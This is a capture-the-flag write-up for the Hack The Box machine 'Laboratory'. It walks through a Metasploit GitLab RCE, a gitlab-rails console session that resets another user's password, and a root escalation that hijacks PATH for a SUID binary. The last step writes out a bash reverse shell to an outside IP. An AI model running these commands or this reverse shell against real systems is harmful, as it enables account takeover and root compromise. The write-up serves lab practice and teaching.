Laboratory

This box has Gitlab on address https://git.laboratory.htb/ which can be exploited via multi/http/gitlabfileread_rce on metasploit, I'm not going too deep on this since I had some very bad time on my first time trying some exploits from Github and none of them worked so It's just easier to use Metasploit for this one!

After getting in we have access to gitlab-rails console which allows us to change users password's on Gitlab to have more smooth experience enumerating Gitlab repos since Gitlab had atleast one repository which was owned by dexter.


gitlab-rails console
GitLab:       12.8.1 (d18b43a5f5a) FOSS
Loading production environment (Rails 6.0.2)
user = User.find_by(username: 'dexter')
irb(main):001:0> user = User.find_by(username: 'dexter')
user = User.find_by(username: 'dexter')
=> #<User id:1 @dexter>
user.password = 'secret_pass'
irb(main):002:0> user.password = 'secret_pass'
user.password = 'secret_pass'
=> "secret_pass"
user.password_confirmation = 'secret_pass'
irb(main):003:0> user.password_confirmation = 'secret_pass'
user.password_confirmation = 'secret_pass'
=> "secret_pass"
user.save!
irb(main):004:0> user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: 1b66de54-3f22-4b3b-86e7-48f8cce37bf4) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007f5127fcbe60 @uri=#<URI::GID gid://gitlab/User/1>>
=> true

After logging in and checking out Dexter's repos we found something very useful: dexter rsa

So after running linenum as dexter we found SUID-file /usr/local/bin/docker-security which is runnable by dexter. SUID-file means that it executes as the owner of the file and since root ownes the file if we manage to modify the code we can execute commands as root. So, running file on docker-security told us that it's ELF-executable and that source code is not readable without tools. So we downloaded the ELF to Kali machine and inspected it with Ghidra.

ghidra-docker-security

At first glance it seems to just be changing file permissions with chmod but it doesn't use absolute path while calling chmod so we can exploit this. By adding new path to dexter's PATH-variable and creating a executable called chmod we can change the functionality of this program to do whatever we want.


cd /home/dexter
touch chmod
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.14.50/1337 0>&1' > chmod
export PATH=/home/dexter:$PATH
/usr/local/bin/docker-security

Here we created a file called chmod on dexter's home folder, added script to give us a shell, added home directory to path and finally ran the ELF-executable and we got shell as root on the box!